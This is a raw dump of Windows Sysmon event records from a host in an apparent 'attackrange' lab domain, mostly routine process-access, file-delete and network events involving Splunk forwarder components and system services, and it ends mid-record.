13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496401Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496400Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:00.603{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496432Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:01.034{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C91144C272E138881E9156C6065D339,SHA256=F6D3593133DB9456B6664A83EBB2B77599E06E1D20AE0D5F1705B53DCCD839B3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496433Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:02.102{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D0E6DE69FA2C719913B17683B9F9248,SHA256=A35388380235274AE786066141A71B7D4B3D8D7C2F4BB14136FB836E5BF49B96,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496436Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:03.518{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CD34372CA12403E6316CF04AB13D3846,SHA256=6114F7217510C0E464DB00DB6F9DE950C93DC34E512182A67A6B0CD75C7C6E16,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496435Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:03.153{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=665F1A65D17C63254F5654E9D4A85AA9,SHA256=D633F37B38FAB9F65698F7FDBC9ADCD2768FA1398C87239B36342E064A9D8509,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496434Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:32.881{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50408-false10.0.1.12-8000- 23542300x800000000000000036496438Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:04.186{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84A4776F4391E831693EF04F9F0158A3,SHA256=F7CF2F49615A83BD4FBF0F931975AF8A91F81BB39FD5FDC146D4AAE51F924629,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496437Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:33.981{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50409-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496439Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:05.233{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEDBB61A7EDD4A8986BE2E10031629C9,SHA256=6D7A4B10EA3E25502C6B86B3C80CA8BB731263272CE45E7B3A90E3DCCFD8D247,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496443Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:06.986{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CF20CB1D7D0A82340CC5DAA744251FB6,SHA256=92FA13308D117BDDCA454878BF794B40328FC0CA411A923A5451CC6BD443EB91,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496442Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:06.986{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BDD06FF7FA19450EF371AD3F8F4AFDC0,SHA256=799A6F52A6252649382223EA152B4FA3F9C276595A11A13C41F8DD9E73119002,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496441Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:06.251{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6F80C9AAAA08A5AA2ED49757DE0053B,SHA256=37B78212E53A772BF20B2FD3AD285FFC3A1117F23CE5AB9765B7A1BDD52BE6F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000036496440Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:12:06.001{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7a96a-0x1da9da23) 23542300x800000000000000036496445Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:07.270{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=505C6DC7AADB325421766D7BC28F6385,SHA256=456CCAE6511368412FFBC94481E83D049F8FD201AC026CB03F3AAC6ECAD332B5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496444Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:37.664{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-987.attackrange.local123ntpfalse10.0.1.14WIN-DC-128123ntp 10341000x800000000000000036496463Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.684{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9FA8-6140-5A56-04000000C801}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496462Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.684{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496461Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.684{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496460Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.684{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496459Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.684{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496458Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.684{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-9FA8-6140-5A56-04000000C801}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496457Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.684{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9FA8-6140-5A56-04000000C801}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496456Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.669{B81B27B7-9FA8-6140-5A56-04000000C801}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000036496455Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.300{B81B27B7-9FA8-6140-5956-04000000C801}44045356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496454Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.284{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD17338C14B20FF3ACB33B7572FE82EE,SHA256=08CD79E27BF3A7B8D7B462E22C13153A8552F65031F13A5BDD21F49DBB0C1830,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496453Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.100{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9FA8-6140-5956-04000000C801}4404C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496452Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.100{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496451Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.100{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496450Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.100{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496449Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.100{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496448Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.100{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-9FA8-6140-5956-04000000C801}4404C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496447Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.100{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9FA8-6140-5956-04000000C801}4404C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496446Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.085{B81B27B7-9FA8-6140-5956-04000000C801}4404C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496468Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:09.800{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496467Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:09.384{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 